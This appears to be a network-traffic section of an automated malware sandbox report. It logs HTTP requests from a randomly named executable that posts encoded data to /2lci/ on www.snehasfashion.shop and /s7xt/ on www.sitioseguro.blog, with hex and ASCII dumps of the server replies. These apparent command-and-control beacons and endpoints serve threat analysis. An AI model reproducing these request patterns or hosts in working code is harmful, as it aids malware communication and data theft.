                                                                  Data Raw: 65 36 73 48 38 3d 6f 55 70 57 30 59 68 6d 59 2b 55 61 6d 45 2b 58 70 64 7a 47 61 32 33 34 67 59 7a 5a 4c 66 67 44 4f 6f 4b 48 65 56 77 4c 6f 36 65 6c 63 50 66 77 53 42 70 66 53 70 66 55 73 54 59 72 72 56 4c 4e 69 64 33 76 2f 67 61 49 70 4d 56 48 42 2f 33 4b 6d 47 6c 6f 46 79 2b 44 58 38 2b 71 2b 74 35 35 56 58 73 38 4e 67 57 4e 56 73 5a 48 78 45 53 4c 35 72 4c 7a 53 63 75 41 66 2b 51 2b 4c 78 6a 6c 4e 2b 50 65 79 50 68 76 2f 70 47 6b 4b 68 71 79 33 77 65 49 4a 61 6e 37 33 57 73 43 6a 67 32 68 47 4e 30 30 58 31 39 4e 55 55 63 35 4b 58 6e 75 77 64 61 6f 6c 74 79 62 67 48 4d 49 6e 77 33 46 2f 4a 79 56 33 7a 55 3d
                                                                  Data Ascii: e6sH8=oUpW0YhmY+UamE+XpdzGa234gYzZLfgDOoKHeVwLo6elcPfwSBpfSpfUsTYrrVLNid3v/gaIpMVHB/3KmGloFy+DX8+q+t55VXs8NgWNVsZHxESL5rLzScuAf+Q+LxjlN+PeyPhv/pGkKhqy3weIJan73WsCjg2hGN00X19NUUc5KXnuwdaoltybgHMInw3F/JyV3zU=
                                                                  Jan 11, 2025 01:22:32.998717070 CET1236INHTTP/1.1 404 Not Found
                                                                  Connection: close
                                                                  x-powered-by: PHP/8.1.29
                                                                  cache-control: no-cache, private
                                                                  content-type: text/html; charset=UTF-8
                                                                  content-length: 1992
                                                                  content-encoding: br
                                                                  vary: Accept-Encoding
                                                                  date: Sat, 11 Jan 2025 00:22:32 GMT
                                                                  Data Raw: 42 39 03 80 fc bf 5f da ff f7 e7 eb 3e df 96 cc e1 52 20 6e 35 d3 be 65 5d 89 5e 0d 13 10 8f 60 6b ea 70 35 f7 af 30 6f be 30 5f b8 2a 85 6c eb 2a 49 b8 dd db 9b 69 a0 9c 94 00 f6 36 79 84 2a 29 30 28 22 45 ce 22 2a 54 9d aa 1a 09 28 65 1f c3 f9 6c 0b b1 10 78 b8 3d 0c 13 b0 e0 c3 cd cb 73 74 76 ea 55 2f 74 9f d1 98 3d dc 00 00 7c 35 c4 81 c3 fa 2f 1d c5 99 e5 bf 9f 81 e2 7d b6 c4 1e eb cc cb 7c a3 76 74 9f d5 9c 8c 0c 37 fa 49 f5 ac 7b 3c 2a 18 fc ea fb dd 60 68 b5 a5 7b 99 3d dc 40 bc 8b 68 a2 a5 87 6f 7d 84 19 a4 67 e3 96 f1 fb 76 21 5e 2d e1 b0 1c 00 c0 ed 8b 37 60 fc b6 cf c3 3c 13 6f 43 80 c7 9a 0b 2e e1 35 7c f3 c5 cf f0 b5 69 69 0c 04 af 61 30 f1 bc 9c 66 ff ff 24 46 6a bd d5 e1 36 ec 81 5e dc 9e a3 b3 5b 66 7d 81 24 97 c5 11 9f e8 74 31 11 23 ad 11 83 79 26 d4 dd ab 25 c4 46 0a f1 b6 f4 b5 8a a4 37 81 8b 17 c0 01 52 eb 3b da 8a e3 22 ce 8f 3e 4c ba 25 66 b2 8e 7e ee 43 30 cf d4 48 72 e9 af 81 7e ab ff d9 de 39 b2 12 b6 99 3d 30 fd bb fb e7 c2 c5 30 d4 d3 64 09 2d cf c2 3e b4 66 bc 7c a3 db [TRUNCATED]
                                                                  Data Ascii: B9_>R n5e]^`kp50o0_*l*Ii6y*)0("E"*T(elx=stvU/t=|5/}|vt7I{<*`h{=@ho}gv!^-7`<oC.5|iia0f$Fj6^[f}$t1#y&%F7R;">L%f~C0Hr~9=00d->f|v_~'</_G>'H}|_xrOWwxH/X3>kFi/fG47IQl#YRb-}C?QoG~-=v)<r'{k#zCK|:Hi@?k#io}<N{Q;px0+J!UoA^1UmyZu+\1W,M\7s+H<B<07KLI\&>kMx(\Jf*xWoenrmG`RXlb&k{G<Y3HpZUI.%q=f#6tgJ.H]xFrWh4WNN"N*# e]n*gsBAxNZ4K43d$a+:%{n]>cSJ( Jt4BoV8+?oh2G_-'[S#Gj
                                                                  Jan 11, 2025 01:22:32.998760939 CET1005INData Raw: 28 8a 0d b9 a5 45 e2 e1 ac 3b ff d4 15 81 f1 ec 8d 00 39 ad 70 98 56 10 40 06 cf 21 98 60 82 71 b9 67 ce 8d 57 c3 44 b9 af fd aa 49 42 e7 04 4d 57 37 5a e8 af 38 a9 84 fe 8b f5 00 8a 66 29 0a 19 9e 34 1a a1 ab f6 7b e8 4d 7d 80 6e d4 5c 36 50 25
                                                                  Data Ascii: (E;9pV@!`qgWDIBMW7Z8f)4{M}n\6P%SfM+:k,eknK-4,UZ4mJ|<0j&i+.>UIkHj*A<^VG?qqvJ q=F?F|}<qhFaWIK\>R4


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  14192.168.2.54999888.198.8.150801240C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Jan 11, 2025 01:22:34.827812910 CET730OUTPOST /2lci/ HTTP/1.1
                                                                  Host: www.snehasfashion.shop
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Origin: http://www.snehasfashion.shop
                                                                  Content-Length: 226
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cache-Control: no-cache
                                                                  Connection: close
                                                                  Referer: http://www.snehasfashion.shop/2lci/
                                                                  User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                  Data Raw: 65 36 73 48 38 3d 6f 55 70 57 30 59 68 6d 59 2b 55 61 6d 6b 4f 58 6c 61 48 47 53 32 33 33 75 34 7a 5a 51 76 67 48 4f 6f 57 48 65 55 46 4f 6f 4a 71 6c 46 75 76 77 54 46 64 66 52 70 66 55 30 6a 59 79 7a 31 4c 53 69 64 79 46 2f 69 4f 49 70 4d 42 48 42 39 76 4b 6d 56 39 72 45 69 2b 46 4f 73 2b 6f 36 74 35 35 56 58 73 38 4e 67 43 33 56 73 42 48 78 30 43 4c 6f 36 4c 79 4f 4d 75 44 4a 75 51 2b 42 52 69 4e 4e 2b 50 77 79 4f 74 46 2f 71 2b 6b 4b 69 2b 79 35 43 6d 4c 53 4b 6e 78 71 47 73 4a 74 54 54 75 44 66 34 49 58 6b 4d 33 49 6b 55 68 47 42 57 45 71 2f 53 41 32 4e 65 6a 77 55 45 2f 32 41 57 73 6c 71 69 6c 70 6b 42 4f 39 7a 36 6c 7a 56 72 4c 54 6a 78 43 2f 6d 35 69 71 36 75 46
                                                                  Data Ascii: e6sH8=oUpW0YhmY+UamkOXlaHGS233u4zZQvgHOoWHeUFOoJqlFuvwTFdfRpfU0jYyz1LSidyF/iOIpMBHB9vKmV9rEi+FOs+o6t55VXs8NgC3VsBHx0CLo6LyOMuDJuQ+BRiNN+PwyOtF/q+kKi+y5CmLSKnxqGsJtTTuDf4IXkM3IkUhGBWEq/SA2NejwUE/2AWslqilpkBO9z6lzVrLTjxC/m5iq6uF
                                                                  Jan 11, 2025 01:22:35.540508986 CET1236INHTTP/1.1 404 Not Found
                                                                  Connection: close
                                                                  x-powered-by: PHP/8.1.29
                                                                  cache-control: no-cache, private
                                                                  content-type: text/html; charset=UTF-8
                                                                  content-length: 1992
                                                                  content-encoding: br
                                                                  vary: Accept-Encoding
                                                                  date: Sat, 11 Jan 2025 00:22:35 GMT
                                                                  Data Raw: 42 39 03 80 fc bf 5f da ff f7 e7 eb 3e df 96 cc e1 52 20 6e 35 d3 be 65 5d 89 5e 0d 13 10 8f 60 6b ea 70 35 f7 af 30 6f be 30 5f b8 2a 85 6c eb 2a 49 b8 dd db 9b 69 a0 9c 94 00 f6 36 79 84 2a 29 30 28 22 45 ce 22 2a 54 9d aa 1a 09 28 65 1f c3 f9 6c 0b b1 10 78 b8 3d 0c 13 b0 e0 c3 cd cb 73 74 76 ea 55 2f 74 9f d1 98 3d dc 00 00 7c 35 c4 81 c3 fa 2f 1d c5 99 e5 bf 9f 81 e2 7d b6 c4 1e eb cc cb 7c a3 76 74 9f d5 9c 8c 0c 37 fa 49 f5 ac 7b 3c 2a 18 fc ea fb dd 60 68 b5 a5 7b 99 3d dc 40 bc 8b 68 a2 a5 87 6f 7d 84 19 a4 67 e3 96 f1 fb 76 21 5e 2d e1 b0 1c 00 c0 ed 8b 37 60 fc b6 cf c3 3c 13 6f 43 80 c7 9a 0b 2e e1 35 7c f3 c5 cf f0 b5 69 69 0c 04 af 61 30 f1 bc 9c 66 ff ff 24 46 6a bd d5 e1 36 ec 81 5e dc 9e a3 b3 5b 66 7d 81 24 97 c5 11 9f e8 74 31 11 23 ad 11 83 79 26 d4 dd ab 25 c4 46 0a f1 b6 f4 b5 8a a4 37 81 8b 17 c0 01 52 eb 3b da 8a e3 22 ce 8f 3e 4c ba 25 66 b2 8e 7e ee 43 30 cf d4 48 72 e9 af 81 7e ab ff d9 de 39 b2 12 b6 99 3d 30 fd bb fb e7 c2 c5 30 d4 d3 64 09 2d cf c2 3e b4 66 bc 7c a3 db [TRUNCATED]
                                                                  Data Ascii: B9_>R n5e]^`kp50o0_*l*Ii6y*)0("E"*T(elx=stvU/t=|5/}|vt7I{<*`h{=@ho}gv!^-7`<oC.5|iia0f$Fj6^[f}$t1#y&%F7R;">L%f~C0Hr~9=00d->f|v_~'</_G>'H}|_xrOWwxH/X3>kFi/fG47IQl#YRb-}C?QoG~-=v)<r'{k#zCK|:Hi@?k#io}<N{Q;px0+J!UoA^1UmyZu+\1W,M\7s+H<B<07KLI\&>kMx(\Jf*xWoenrmG`RXlb&k{G<Y3HpZUI.%q=f#6tgJ.H]xFrWh4WNN"N*# e]n*gsBAxNZ4K43d$a+:%{n]>cSJ( Jt4BoV8+?oh2G_-'[S#Gj
                                                                  Jan 11, 2025 01:22:35.540528059 CET224INData Raw: 28 8a 0d b9 a5 45 e2 e1 ac 3b ff d4 15 81 f1 ec 8d 00 39 ad 70 98 56 10 40 06 cf 21 98 60 82 71 b9 67 ce 8d 57 c3 44 b9 af fd aa 49 42 e7 04 4d 57 37 5a e8 af 38 a9 84 fe 8b f5 00 8a 66 29 0a 19 9e 34 1a a1 ab f6 7b e8 4d 7d 80 6e d4 5c 36 50 25
                                                                  Data Ascii: (E;9pV@!`qgWDIBMW7Z8f)4{M}n\6P%SfM+:k,eknK-4,UZ4mJ|<0j&i+.>UIkHj*A<^VG?qqvJ q=F?F|}<qhF
                                                                  Jan 11, 2025 01:22:35.540544987 CET781INData Raw: 61 d6 57 49 c0 4b 5c c6 b9 01 3e 99 8e e6 cd 52 8c 34 e3 f7 e5 cf db 70 51 90 4b fc 09 8b 8d 8f 22 02 3f ec 09 6b 6b 47 1d a0 d3 40 9f d8 39 0c 19 66 c3 dc 8c 09 28 37 b3 fe f6 b4 8b 43 5b 45 c6 d0 4c 9a f6 ed ec 24 73 66 74 7a dd 09 26 fb 79 bf
                                                                  Data Ascii: aWIK\>R4pQK"?kkG@9f(7C[EL$sftz&yO/zE0qoo"fuh]2.O}Hxuf2*fT@[BmS P@L?elcYGc]4?b4~iiD`1 Liz


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  15192.168.2.54999988.198.8.150801240C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Jan 11, 2025 01:22:37.393759966 CET1747OUTPOST /2lci/ HTTP/1.1
                                                                  Host: www.snehasfashion.shop
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Origin: http://www.snehasfashion.shop
                                                                  Content-Length: 1242
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cache-Control: no-cache
                                                                  Connection: close
                                                                  Referer: http://www.snehasfashion.shop/2lci/
                                                                  User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                  Data Raw: 65 36 73 48 38 3d 6f 55 70 57 30 59 68 6d 59 2b 55 61 6d 6b 4f 58 6c 61 48 47 53 32 33 33 75 34 7a 5a 51 76 67 48 4f 6f 57 48 65 55 46 4f 6f 49 53 6c 46 34 54 77 53 6b 64 66 51 70 66 55 71 54 59 33 7a 31 4c 66 69 64 4b 42 2f 69 43 79 70 4b 46 48 42 65 6e 4b 78 55 39 72 4b 69 2b 46 54 38 2b 70 2b 74 35 67 56 58 39 31 4e 67 53 33 56 73 42 48 78 79 2b 4c 34 62 4c 79 64 38 75 41 66 2b 51 49 4c 78 69 32 4e 2f 72 47 79 4f 70 2f 34 61 65 6b 4b 43 75 79 31 52 65 4c 50 61 6e 33 70 47 74 4a 74 54 75 75 44 66 6b 54 58 6b 49 4e 49 6d 45 68 45 6e 2f 35 37 2b 4c 59 79 4f 37 44 6a 54 34 65 6e 58 53 32 69 35 43 6a 31 48 39 4f 36 52 4b 5a 2f 77 4c 55 48 78 6f 6d 6b 47 55 78 6d 76 58 74 71 35 62 52 71 64 55 57 2b 42 6b 51 49 30 73 7a 4c 78 2b 6c 69 4e 39 6f 4f 34 61 46 51 55 61 6f 50 77 32 6b 36 38 36 76 45 52 45 31 45 5a 64 73 71 43 56 59 77 49 55 53 58 34 4d 30 48 66 62 6f 55 49 54 4b 58 43 59 67 47 39 50 50 57 4f 4f 38 43 32 54 32 71 36 72 62 35 50 57 50 35 31 4d 46 46 2f 7a 52 64 62 4a 72 66 42 68 52 4d 31 67 44 [TRUNCATED]
                                                                  Data Ascii: e6sH8=oUpW0YhmY+UamkOXlaHGS233u4zZQvgHOoWHeUFOoISlF4TwSkdfQpfUqTY3z1LfidKB/iCypKFHBenKxU9rKi+FT8+p+t5gVX91NgS3VsBHxy+L4bLyd8uAf+QILxi2N/rGyOp/4aekKCuy1ReLPan3pGtJtTuuDfkTXkINImEhEn/57+LYyO7DjT4enXS2i5Cj1H9O6RKZ/wLUHxomkGUxmvXtq5bRqdUW+BkQI0szLx+liN9oO4aFQUaoPw2k686vERE1EZdsqCVYwIUSX4M0HfboUITKXCYgG9PPWOO8C2T2q6rb5PWP51MFF/zRdbJrfBhRM1gDcsfNy2AoH7sp80UAXmDFChySff0n2fw2zhJyZ7Rrwsdg4o+ydClwasZ8AtCKukHVdIzK0HbEagrS/mVioxoAlL3Tr5ddkoZ+vevto5XQPa+S7WOxv6BbNyaFf2ZULgfOBr1FdYqyC23jQo/jT0238J7U9NVyUW1+xJagauQmlMBLKJsiLhfDGEHzzXicRcok3kvNeDqxEzeIfN0zwBN51kNdX2OmrEVtnFSVtRfuWwdhcOcAKV895lkCOJzwhyJ7xs4T5wHkFeRMe8WIA3mVl4cqtsgMJJWB24d5s59CJquzllsUvlL2DAoVh2ve1xu9jX3QXChQJWPIvBphuDGZg5kint8Ff2t29UH0GDdCt+KSKUWaRoVX6jS76EHjIMWMR2u3ESAyPCMr4vLTfYf5f73j/e9FFohdasPP3mtYOelfurNsSHPiu1czUwvWwYjf3IGSYZHdkHZDi1LtkDrv3rveCKXt3rYExE9A130CFeRpUa4nCJUeILxEiT3hqhCW8hJezNjyYxBtDGn+Iq2aJE9nljktj3iUBkr0gZJfzXehrhTDB1sGkonsi9/oe+ozRSuh4YuslvHCCQNtn596hUuOw5zOGfVSXhUR7wWv+D1HOqauASZq/MgixneZ2AWhwm0FjM8iBVYT5qrXIwdX+cwHPkcUXLIOhv [TRUNCATED]
                                                                  Jan 11, 2025 01:22:38.065474987 CET1236INHTTP/1.1 404 Not Found
                                                                  Connection: close
                                                                  x-powered-by: PHP/8.1.29
                                                                  cache-control: no-cache, private
                                                                  content-type: text/html; charset=UTF-8
                                                                  content-length: 1992
                                                                  content-encoding: br
                                                                  vary: Accept-Encoding
                                                                  date: Sat, 11 Jan 2025 00:22:37 GMT
                                                                  Data Raw: 42 39 03 80 fc bf 5f da ff f7 e7 eb 3e df 96 cc e1 52 20 6e 35 d3 be 65 5d 89 5e 0d 13 10 8f 60 6b ea 70 35 f7 af 30 6f be 30 5f b8 2a 85 6c eb 2a 49 b8 dd db 9b 69 a0 9c 94 00 f6 36 79 84 2a 29 30 28 22 45 ce 22 2a 54 9d aa 1a 09 28 65 1f c3 f9 6c 0b b1 10 78 b8 3d 0c 13 b0 e0 c3 cd cb 73 74 76 ea 55 2f 74 9f d1 98 3d dc 00 00 7c 35 c4 81 c3 fa 2f 1d c5 99 e5 bf 9f 81 e2 7d b6 c4 1e eb cc cb 7c a3 76 74 9f d5 9c 8c 0c 37 fa 49 f5 ac 7b 3c 2a 18 fc ea fb dd 60 68 b5 a5 7b 99 3d dc 40 bc 8b 68 a2 a5 87 6f 7d 84 19 a4 67 e3 96 f1 fb 76 21 5e 2d e1 b0 1c 00 c0 ed 8b 37 60 fc b6 cf c3 3c 13 6f 43 80 c7 9a 0b 2e e1 35 7c f3 c5 cf f0 b5 69 69 0c 04 af 61 30 f1 bc 9c 66 ff ff 24 46 6a bd d5 e1 36 ec 81 5e dc 9e a3 b3 5b 66 7d 81 24 97 c5 11 9f e8 74 31 11 23 ad 11 83 79 26 d4 dd ab 25 c4 46 0a f1 b6 f4 b5 8a a4 37 81 8b 17 c0 01 52 eb 3b da 8a e3 22 ce 8f 3e 4c ba 25 66 b2 8e 7e ee 43 30 cf d4 48 72 e9 af 81 7e ab ff d9 de 39 b2 12 b6 99 3d 30 fd bb fb e7 c2 c5 30 d4 d3 64 09 2d cf c2 3e b4 66 bc 7c a3 db [TRUNCATED]
                                                                  Data Ascii: B9_>R n5e]^`kp50o0_*l*Ii6y*)0("E"*T(elx=stvU/t=|5/}|vt7I{<*`h{=@ho}gv!^-7`<oC.5|iia0f$Fj6^[f}$t1#y&%F7R;">L%f~C0Hr~9=00d->f|v_~'</_G>'H}|_xrOWwxH/X3>kFi/fG47IQl#YRb-}C?QoG~-=v)<r'{k#zCK|:Hi@?k#io}<N{Q;px0+J!UoA^1UmyZu+\1W,M\7s+H<B<07KLI\&>kMx(\Jf*xWoenrmG`RXlb&k{G<Y3HpZUI.%q=f#6tgJ.H]xFrWh4WNN"N*# e]n*gsBAxNZ4K43d$a+:%{n]>cSJ( Jt4BoV8+?oh2G_-'[S#Gj
                                                                  Jan 11, 2025 01:22:38.065526009 CET1005INData Raw: 28 8a 0d b9 a5 45 e2 e1 ac 3b ff d4 15 81 f1 ec 8d 00 39 ad 70 98 56 10 40 06 cf 21 98 60 82 71 b9 67 ce 8d 57 c3 44 b9 af fd aa 49 42 e7 04 4d 57 37 5a e8 af 38 a9 84 fe 8b f5 00 8a 66 29 0a 19 9e 34 1a a1 ab f6 7b e8 4d 7d 80 6e d4 5c 36 50 25
                                                                  Data Ascii: (E;9pV@!`qgWDIBMW7Z8f)4{M}n\6P%SfM+:k,eknK-4,UZ4mJ|<0j&i+.>UIkHj*A<^VG?qqvJ q=F?F|}<qhFaWIK\>R4


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  16192.168.2.55000088.198.8.150801240C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Jan 11, 2025 01:22:40.059693098 CET439OUTGET /2lci/?rr=BbldmNsp8&e6sH8=lWB23sttXuwU7VKah9TQdWzGmdySIZI8VeHdcV4a5pKuSPzOO09MVK+LpGEounTDi5Cb1FGE36E3AeLK+XZDNCiHfOCZyv1qYWJ1bwu2fvFY8APk0KaeRNG0Pv4PAhLvZA== HTTP/1.1
                                                                  Host: www.snehasfashion.shop
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Connection: close
                                                                  User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                  Jan 11, 2025 01:22:40.757504940 CET1236INHTTP/1.1 404 Not Found
                                                                  Connection: close
                                                                  x-powered-by: PHP/8.1.29
                                                                  cache-control: no-cache, private
                                                                  content-type: text/html; charset=UTF-8
                                                                  content-length: 6603
                                                                  date: Sat, 11 Jan 2025 00:22:40 GMT
                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 21 20 6e 6f 72 6d 61 6c 69 7a 65 2e 63 73 73 20 76 38 2e 30 2e 31 20 7c 20 4d 49 54 20 4c 69 63 65 6e 73 65 20 7c 20 67 69 74 68 75 62 2e 63 6f 6d 2f 6e 65 63 6f 6c 61 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 63 73 73 20 2a 2f 68 74 6d 6c 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 31 35 3b 2d 77 65 62 6b 69 74 2d 74 65 78 74 2d 73 69 7a 65 2d 61 64 6a 75 73 74 3a [TRUNCATED]
                                                                  Data Ascii: <!DOCTYPE html><html lang="en"> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>Not Found</title> <style> /*! normalize.css v8.0.1 | MIT License | github.com/necolas/normalize.css */html{line-height:1.15;-webkit-text-size-adjust:100%}body{margin:0}a{background-color:transparent}code{font-family:monospace,monospace;font-size:1em}[hidden]{display:none}html{font-family:system-ui,-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Helvetica Neue,Arial,Noto Sans,sans-serif,Apple Color Emoji,Segoe UI Emoji,Segoe UI Symbol,Noto Color Emoji;line-height:1.5}*,:after,:before{box-sizing:border-box;border:0 solid #e2e8f0}a{color:inherit;text-decoration:inherit}code{font-family:Menlo,Monaco,Consolas,Liberation Mono,Courier New,monospace}svg,video{display:block;vertical-align:middle}video{max-width:100%;height:auto}.bg-white{--bg-opacity:1;background-color:#fff;background-color:rgba(255,255,255,var(--bg-opa [TRUNCATED]
                                                                  Jan 11, 2025 01:22:40.757567883 CET1236INData Raw: 2d 2d 62 67 2d 6f 70 61 63 69 74 79 3a 31 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 37 66 61 66 63 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 72 67 62 61 28 32 34 37 2c 32 35 30 2c 32 35 32 2c 76 61 72 28 2d 2d 62 67
                                                                  Data Ascii: --bg-opacity:1;background-color:#f7fafc;background-color:rgba(247,250,252,var(--bg-opacity))}.border-gray-200{--border-opacity:1;border-color:#edf2f7;border-color:rgba(237,242,247,var(--border-opacity))}.border-gray-400{--border-opacity:1;bord
                                                                  Jan 11, 2025 01:22:40.757602930 CET448INData Raw: 70 6f 73 69 74 69 6f 6e 3a 66 69 78 65 64 7d 2e 72 65 6c 61 74 69 76 65 7b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 74 6f 70 2d 30 7b 74 6f 70 3a 30 7d 2e 72 69 67 68 74 2d 30 7b 72 69 67 68 74 3a 30 7d 2e 73 68 61 64 6f 77 7b 62
                                                                  Data Ascii: position:fixed}.relative{position:relative}.top-0{top:0}.right-0{right:0}.shadow{box-shadow:0 1px 3px 0 rgba(0,0,0,.1),0 1px 2px 0 rgba(0,0,0,.06)}.text-center{text-align:center}.text-gray-200{--text-opacity:1;color:#edf2f7;color:rgba(237,242,
                                                                  Jan 11, 2025 01:22:40.757637024 CET1236INData Raw: 2e 74 65 78 74 2d 67 72 61 79 2d 35 30 30 7b 2d 2d 74 65 78 74 2d 6f 70 61 63 69 74 79 3a 31 3b 63 6f 6c 6f 72 3a 23 61 30 61 65 63 30 3b 63 6f 6c 6f 72 3a 72 67 62 61 28 31 36 30 2c 31 37 34 2c 31 39 32 2c 76 61 72 28 2d 2d 74 65 78 74 2d 6f 70
                                                                  Data Ascii: .text-gray-500{--text-opacity:1;color:#a0aec0;color:rgba(160,174,192,var(--text-opacity))}.text-gray-600{--text-opacity:1;color:#718096;color:rgba(113,128,150,var(--text-opacity))}.text-gray-700{--text-opacity:1;color:#4a5568;color:rgba(74,85,
                                                                  Jan 11, 2025 01:22:40.757672071 CET1236INData Raw: 62 69 63 2d 62 65 7a 69 65 72 28 2e 38 2c 30 2c 31 2c 31 29 7d 35 30 25 7b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 59 28 30 29 3b 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 74 69 6d 69 6e 67 2d 66 75 6e 63 74 69 6f 6e
                                                                  Data Ascii: bic-bezier(.8,0,1,1)}50%{transform:translateY(0);-webkit-animation-timing-function:cubic-bezier(0,0,.2,1);animation-timing-function:cubic-bezier(0,0,.2,1)}}@keyframes bounce{0%,to{transform:translateY(-25%);-webkit-animation-timing-function:cu
                                                                  Jan 11, 2025 01:22:40.757704973 CET1236INData Raw: 6b 5c 3a 62 67 2d 67 72 61 79 2d 39 30 30 7b 2d 2d 62 67 2d 6f 70 61 63 69 74 79 3a 31 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 31 61 32 30 32 63 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 72 67 62 61 28 32 36 2c 33 32
                                                                  Data Ascii: k\:bg-gray-900{--bg-opacity:1;background-color:#1a202c;background-color:rgba(26,32,44,var(--bg-opacity))}.dark\:border-gray-700{--border-opacity:1;border-color:#4a5568;border-color:rgba(74,85,104,var(--border-opacity))}.dark\:text-white{--text
                                                                  Jan 11, 2025 01:22:40.757739067 CET179INData Raw: 20 74 65 78 74 2d 67 72 61 79 2d 35 30 30 20 75 70 70 65 72 63 61 73 65 20 74 72 61 63 6b 69 6e 67 2d 77 69 64 65 72 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 4e 6f 74 20 46 6f 75 6e 64 20 20 20 20 20 20 20
                                                                  Data Ascii: text-gray-500 uppercase tracking-wider"> Not Found </div> </div> </div> </div> </body></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  17192.168.2.550001104.21.15.100801240C:\Program Files (x86)\ZpjyPsJVUhMZhbIyCuzCDjDyjULImuyJAWSSPFgvkKLYaBFbtpQWgHhCgpzUDZzbXIzWgXVQqsM\ysdBLufRFxAq.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Jan 11, 2025 01:22:45.812261105 CET704OUTPOST /s7xt/ HTTP/1.1
                                                                  Host: www.sitioseguro.blog
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-US,en;q=0.9
                                                                  Origin: http://www.sitioseguro.blog
                                                                  Content-Length: 206
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cache-Control: no-cache
                                                                  Connection: close
                                                                  Referer: http://www.sitioseguro.blog/s7xt/
                                                                  User-Agent: Mozilla/5.0 (Android 4.2; rv:19.0) Gecko/20121129 Firefox/19.0
                                                                  Data Raw: 65 36 73 48 38 3d 48 4b 77 6d 6e 77 38 43 37 34 6d 76 41 2b 70 39 7a 31 69 43 59 31 56 31 55 67 64 79 62 57 39 6d 61 4a 6d 65 78 63 52 74 35 41 32 62 75 35 62 76 44 54 6a 42 75 50 30 6f 35 6a 30 30 44 6c 6a 71 53 6d 57 4e 75 78 35 64 41 65 75 34 6e 57 50 4c 75 48 37 52 79 56 4a 4a 6b 4b 43 6c 35 72 4e 4c 79 53 74 78 6c 73 44 49 4c 69 44 58 2f 37 69 34 6f 6f 2b 62 31 59 52 38 7a 73 4f 6f 4a 57 6e 6d 35 58 47 56 71 6a 69 32 78 47 47 68 79 35 76 55 69 31 4a 58 39 75 36 74 66 41 54 33 72 55 34 56 4f 2f 72 30 42 71 74 6f 49 33 2b 53 75 6f 30 32 72 33 32 74 73 35 7a 57 77 66 4e 4b 4a 6d 44 43 44 61 30 4a 65 2b 6b 3d
